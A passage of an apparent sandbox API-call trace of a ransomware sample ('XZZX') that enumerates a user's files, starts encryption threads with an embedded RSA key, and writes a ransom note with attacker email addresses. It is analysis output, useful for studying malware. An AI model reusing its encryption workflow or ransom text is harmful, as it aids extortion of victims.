hTemplateFile=0x0) returned 0xd3c [0196.448] CloseHandle (hObject=0xd3c) returned 1 [0196.448] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0xffffffff [0196.448] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0196.448] FindNextFileW (in: hFindFile=0x43723f8, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0196.448] lstrcmpW (lpString1="Videos", lpString2="..") returned 1 [0196.448] lstrcmpW (lpString1="Videos", lpString2=".") returned 1 [0196.448] lstrcpyW (in: lpString1=0x17e610, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz" [0196.448] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\" [0196.448] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="Videos" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos" [0196.448] SetErrorMode (uMode=0x1) returned 0x1 [0196.448] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos" [0196.448] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" [0196.448] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" [0196.449] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\", lpString2="*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\*.*" [0196.449] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0x4372438 [0196.449] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos") returned="Videos" [0196.449] lstrcpyW (in: lpString1=0x17c6e4, lpString2="Videos" | out: lpString1="Videos") returned="Videos" [0196.449] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0196.449] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0196.449] lstrcmpW (lpString1="0FCB2DF10CA6B6CB526033CF10C79B13.XZZX", lpString2="..") returned 1 [0196.449] lstrcmpW (lpString1="0FCB2DF10CA6B6CB526033CF10C79B13.XZZX", lpString2=".") returned 1 [0196.449] StrStrW (lpFirst="0FCB2DF10CA6B6CB526033CF10C79B13.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0196.449] StrStrW (lpFirst="0FCB2DF10CA6B6CB526033CF10C79B13.XZZX", lpSrch="ntldr") returned 0x0 [0196.449] StrStrW (lpFirst="0FCB2DF10CA6B6CB526033CF10C79B13.XZZX", lpSrch="NTLDR") returned 0x0 [0196.449] StrStrW (lpFirst="0FCB2DF10CA6B6CB526033CF10C79B13.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0196.449] StrStrW (lpFirst="0FCB2DF10CA6B6CB526033CF10C79B13.XZZX", lpSrch="ntdetect.com") returned 0x0 [0196.449] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned 41 [0196.449] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") [0196.449] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0196.449] lstrcpyW (in: lpString1=0x17cf1c, lpString2="0FCB2DF10CA6B6CB526033CF10C79B13.XZZX" | out: lpString1="0FCB2DF10CA6B6CB526033CF10C79B13.XZZX") returned="0FCB2DF10CA6B6CB526033CF10C79B13.XZZX" [0196.449] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" [0196.449] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xd40 [0196.450] Sleep (dwMilliseconds=0x96) [0196.596] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0196.596] lstrcmpW (lpString1="23B23FF43A95B5A94696D7543EB699F1.XZZX", lpString2="..") returned 1 [0196.597] lstrcmpW (lpString1="23B23FF43A95B5A94696D7543EB699F1.XZZX", lpString2=".") returned 1 [0196.597] StrStrW (lpFirst="23B23FF43A95B5A94696D7543EB699F1.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0196.597] StrStrW (lpFirst="23B23FF43A95B5A94696D7543EB699F1.XZZX", lpSrch="ntldr") returned 0x0 [0196.597] StrStrW (lpFirst="23B23FF43A95B5A94696D7543EB699F1.XZZX", lpSrch="NTLDR") returned 0x0 [0196.597] StrStrW (lpFirst="23B23FF43A95B5A94696D7543EB699F1.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0196.597] StrStrW (lpFirst="23B23FF43A95B5A94696D7543EB699F1.XZZX", lpSrch="ntdetect.com") returned 0x0 [0196.597] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned 41 [0196.597] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") [0196.597] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0196.597] lstrcpyW (in: lpString1=0x17cf1c, lpString2="23B23FF43A95B5A94696D7543EB699F1.XZZX" | out: lpString1="23B23FF43A95B5A94696D7543EB699F1.XZZX") returned="23B23FF43A95B5A94696D7543EB699F1.XZZX" [0196.597] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" [0196.597] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xd44 [0196.598] Sleep (dwMilliseconds=0x96) [0196.752] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0196.752] lstrcmpW (lpString1="3A21FB2547CB7719582A8C7F4BEC5B61.XZZX", lpString2="..") returned 1 [0196.753] lstrcmpW (lpString1="3A21FB2547CB7719582A8C7F4BEC5B61.XZZX", lpString2=".") returned 1 [0196.753] StrStrW (lpFirst="3A21FB2547CB7719582A8C7F4BEC5B61.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0196.753] StrStrW (lpFirst="3A21FB2547CB7719582A8C7F4BEC5B61.XZZX", lpSrch="ntldr") returned 0x0 [0196.753] StrStrW (lpFirst="3A21FB2547CB7719582A8C7F4BEC5B61.XZZX", lpSrch="NTLDR") returned 0x0 [0196.753] StrStrW (lpFirst="3A21FB2547CB7719582A8C7F4BEC5B61.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0196.753] StrStrW (lpFirst="3A21FB2547CB7719582A8C7F4BEC5B61.XZZX", lpSrch="ntdetect.com") returned 0x0 [0196.753] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned 41 [0196.753] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") [0196.753] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0196.753] lstrcpyW (in: lpString1=0x17cf1c, lpString2="3A21FB2547CB7719582A8C7F4BEC5B61.XZZX" | out: lpString1="3A21FB2547CB7719582A8C7F4BEC5B61.XZZX") returned="3A21FB2547CB7719582A8C7F4BEC5B61.XZZX" [0196.753] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" [0196.753] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xd48 [0196.754] Sleep (dwMilliseconds=0x96) [0196.909] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0196.909] lstrcmpW (lpString1="D0384500388B9600F42B1AE33CC07A48.XZZX", lpString2="..") returned 1 [0196.909] lstrcmpW (lpString1="D0384500388B9600F42B1AE33CC07A48.XZZX", lpString2=".") returned 1 [0196.909] StrStrW (lpFirst="D0384500388B9600F42B1AE33CC07A48.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0196.909] StrStrW (lpFirst="D0384500388B9600F42B1AE33CC07A48.XZZX", lpSrch="ntldr") returned 0x0 [0196.909] StrStrW (lpFirst="D0384500388B9600F42B1AE33CC07A48.XZZX", lpSrch="NTLDR") returned 0x0 [0196.909] StrStrW (lpFirst="D0384500388B9600F42B1AE33CC07A48.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0196.909] StrStrW (lpFirst="D0384500388B9600F42B1AE33CC07A48.XZZX", lpSrch="ntdetect.com") returned 0x0 [0196.909] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned 41 [0196.909] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") [0196.909] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0196.909] lstrcpyW (in: lpString1=0x17cf1c, lpString2="D0384500388B9600F42B1AE33CC07A48.XZZX" | out: lpString1="D0384500388B9600F42B1AE33CC07A48.XZZX") returned="D0384500388B9600F42B1AE33CC07A48.XZZX" [0196.909] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" [0196.909] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xd4c [0196.910] Sleep (dwMilliseconds=0x96) [0197.067] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0197.067] lstrcmpW (lpString1="D89AF8F8162B0DAE766745D41A4BF1F6.XZZX", lpString2="..") returned 1 [0197.067] lstrcmpW (lpString1="D89AF8F8162B0DAE766745D41A4BF1F6.XZZX", lpString2=".") returned 1 [0197.067] StrStrW (lpFirst="D89AF8F8162B0DAE766745D41A4BF1F6.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0197.067] StrStrW (lpFirst="D89AF8F8162B0DAE766745D41A4BF1F6.XZZX", lpSrch="ntldr") returned 0x0 [0197.067] StrStrW (lpFirst="D89AF8F8162B0DAE766745D41A4BF1F6.XZZX", lpSrch="NTLDR") returned 0x0 [0197.067] StrStrW (lpFirst="D89AF8F8162B0DAE766745D41A4BF1F6.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0197.067] StrStrW (lpFirst="D89AF8F8162B0DAE766745D41A4BF1F6.XZZX", lpSrch="ntdetect.com") returned 0x0 [0197.067] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned 41 [0197.067] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") [0197.067] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0197.067] lstrcpyW (in: lpString1=0x17cf1c, lpString2="D89AF8F8162B0DAE766745D41A4BF1F6.XZZX" | out: lpString1="D89AF8F8162B0DAE766745D41A4BF1F6.XZZX") returned="D89AF8F8162B0DAE766745D41A4BF1F6.XZZX" [0197.067] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" [0197.067] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xd50 [0197.068] Sleep (dwMilliseconds=0x96) [0197.220] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0197.220] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0197.220] lstrcmpW (lpString1="F12649BC389976C6163CED043CCE5B0E.XZZX", lpString2="..") returned 1 [0197.221] lstrcmpW (lpString1="F12649BC389976C6163CED043CCE5B0E.XZZX", lpString2=".") returned 1 [0197.221] StrStrW (lpFirst="F12649BC389976C6163CED043CCE5B0E.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0197.221] StrStrW (lpFirst="F12649BC389976C6163CED043CCE5B0E.XZZX", lpSrch="ntldr") returned 0x0 [0197.221] StrStrW (lpFirst="F12649BC389976C6163CED043CCE5B0E.XZZX", lpSrch="NTLDR") returned 0x0 [0197.221] StrStrW (lpFirst="F12649BC389976C6163CED043CCE5B0E.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0197.221] StrStrW (lpFirst="F12649BC389976C6163CED043CCE5B0E.XZZX", lpSrch="ntdetect.com") returned 0x0 [0197.221] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned 41 [0197.221] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") [0197.221] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0197.221] lstrcpyW (in: lpString1=0x17cf1c, lpString2="F12649BC389976C6163CED043CCE5B0E.XZZX" | out: lpString1="F12649BC389976C6163CED043CCE5B0E.XZZX") returned="F12649BC389976C6163CED043CCE5B0E.XZZX" [0197.221] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" [0197.221] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xd54 [0197.221] Sleep (dwMilliseconds=0x96) [0197.376] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0197.376] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0197.376] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0197.376] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2="..") returned 1 [0197.377] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2=".") returned 1 [0197.377] StrStrW (lpFirst="_HELP_INSTRUCTION.TXT", lpSrch="_HELP_INSTRUCTION.TXT") returned="_HELP_INSTRUCTION.TXT" [0197.377] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0 [0197.377] FindClose (in: hFindFile=0x4372438 | out: hFindFile=0x4372438) returned 1 [0197.377] FindClose (in: hFindFile=0x4372438 | out: hFindFile=0x4372438) returned 0 [0197.377] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos" [0197.377] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\*.*" [0197.377] SetErrorMode (uMode=0x1) returned 0x1 [0197.377] wsprintfW (in: param_1=0x17c4dc, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_HELP_INSTRUCTION.TXT") returned 58 [0197.377] GetUserNameW (in: lpBuffer=0x17a2b8, pcbBuffer=0x17a0a4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17a0a4) returned 1 [0197.377] wsprintfW (in: param_1=0x17a0b0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0197.377] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17a0ac | out: phkResult=0x17a0ac*=0xd58) returned 0x0 [0197.377] RegQueryValueExW (in: hKey=0xd58, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x43b7fb8, lpcbData=0x17a0a8*=0x104 | out: lpType=0x0, lpData=0x43b7fb8*=0x65, lpcbData=0x17a0a8*=0x4a) returned 0x0 [0197.377] RegCloseKey (hKey=0xd58) returned 0x0 [0197.377] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17b4dc, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0197.378] wsprintfW (in: param_1=0x17a4dc, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as 